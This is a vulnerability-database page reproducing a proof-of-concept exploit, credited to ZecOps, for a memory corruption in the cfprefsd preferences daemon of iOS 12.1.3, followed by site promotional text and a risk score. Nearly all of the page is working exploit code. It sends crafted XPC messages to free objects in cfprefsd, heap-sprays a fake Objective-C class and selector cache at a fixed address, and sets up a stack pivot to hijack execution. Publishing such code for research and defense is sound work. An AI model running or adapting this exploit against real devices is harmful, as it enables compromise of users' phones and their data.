Vulners
Lucene search
iOS 12.1.3 - 'cfprefsd' Memory Corruption
// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
// Intended only for educational and defensive purposes only.
// Use at your own risk.
#include <xpc/xpc.h>
#import <pthread.h>
#include <mach/mach.h>
#include <mach/task.h>
#include <dlfcn.h>
#include <mach-o/dyld_images.h>
#include <objc/runtime.h>
#define AGENT 1
#define FILL_DICT_COUNT 0x600
#define FILL_COUNT 0x1000
#define FREE_COUNT 0x2000
#define FILL_SIZE (0xc0)
int need_stop = 0;
struct heap_spray {
void* fake_objc_class_ptr;
uint32_t r10;
uint32_t r4;
void* fake_sel_addr;
uint32_t r5;
uint32_t r6;
uint64_t cmd;
uint8_t pad1[0x3c];
uint32_t stack_pivot;
struct fake_objc_class_t {
char pad[0x8];
void* cache_buckets_ptr;
uint32_t cache_bucket_mask;
} fake_objc_class;
struct fake_cache_bucket_t {
void* cached_sel;
void* cached_function;
} fake_cache_bucket;
char command[32];
};
void fill_once(){
#if AGENT
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
#endif
xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {
xpc_type_t t = xpc_get_type(response);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
need_stop = 1 ;
}
//printf("received an event\n");
});
xpc_connection_resume(client);
xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t arr = xpc_array_create(NULL, 0);
xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(spray_dict, "CFPreferencesOperation", 8);
xpc_dictionary_set_string(spray_dict, "CFPreferencesDomain", "xpc_str_domain");
xpc_dictionary_set_string(spray_dict, "CFPreferencesUser", "xpc_str_user");
char key[100];
char value[FILL_SIZE];
memset(value, "A", FILL_SIZE);
*((uint64_t *)value) = 0x4142010180202020;
//*((uint64_t *)value) = 0x180202020;
value[FILL_SIZE-1]=0;
for (int i=0; i<FILL_DICT_COUNT; i++) {
sprintf(key, "%d",i);
xpc_dictionary_set_string(spray_dict, key, value);
}
//NSLog(@"%@", spray_dict);
for (uint64_t i=0; i<FILL_COUNT; i++) {
xpc_array_append_value(arr, spray_dict);
}
xpc_dictionary_set_int64(main_dict, "CFPreferencesOperation", 5);
xpc_dictionary_set_value(main_dict, "CFPreferencesMessages", arr);
void* heap_spray_target_addr = (void*)0x180202000;
struct heap_spray* map = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
memset(map, 0, 0x1000);
struct heap_spray* hs = (struct heap_spray*)((uint64_t)map + 0x20);
//hs->null0 = 0;
hs->cmd = -1;
hs->fake_objc_class_ptr = &hs->fake_objc_class;
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
hs->fake_objc_class.cache_bucket_mask = 0;
hs->fake_sel_addr = &hs->fake_cache_bucket.cached_sel;
// nasty hack to find the correct selector address
hs->fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@"dealloc");
hs->fake_cache_bucket.cached_function = 0xdeadbeef;
size_t heap_spray_pages = 0x40000;
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
char* heap_spray_copies = malloc(heap_spray_bytes);
for (int i = 0; i < heap_spray_pages; i++){
memcpy(heap_spray_copies+(i*0x1000), map, 0x1000);
}
xpc_dictionary_set_data(main_dict, "heap_spray", heap_spray_copies, heap_spray_bytes);
//NSLog(@"%@", main_dict);
xpc_connection_send_message(client, main_dict);
printf("fill once\n");
xpc_release(main_dict);
}
void trigger_vul(){
#if AGENT
printf("AGENT\n");
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
printf("DAEMON\n");
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
#endif
xpc_connection_set_event_handler(conn, ^(xpc_object_t response) {
xpc_type_t t = xpc_get_type(response);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
need_stop = 1 ;
}
});
xpc_connection_resume(conn);
xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t arr = xpc_array_create(NULL, 0);
xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(arr_free, "CFPreferencesOperation", 4);
xpc_array_append_value(arr, arr_free);
for (int i=0; i<FREE_COUNT; i++) {
xpc_object_t arr_elem1 = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(arr_elem1, "CFPreferencesOperation", 20);
xpc_array_append_value(arr, arr_elem1);
}
//printf("%p, %p\n", arr_elem1, hello);
xpc_dictionary_set_int64(hello, "CFPreferencesOperation", 5);
xpc_dictionary_set_value(hello, "CFPreferencesMessages", arr);
//NSLog (@"%@", hello);
fill_once();
xpc_connection_send_message(conn, hello);
NSLog(@" trigger vuln");
xpc_release(hello);
}
int main(int argc, const char * argv[]) {
pthread_t fillthread1,triger_thread;
NSLog(@"start to trigger..");
trigger_vul();
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 May 2019 00:00Current
7.4High risk
Vulners AI Score7.4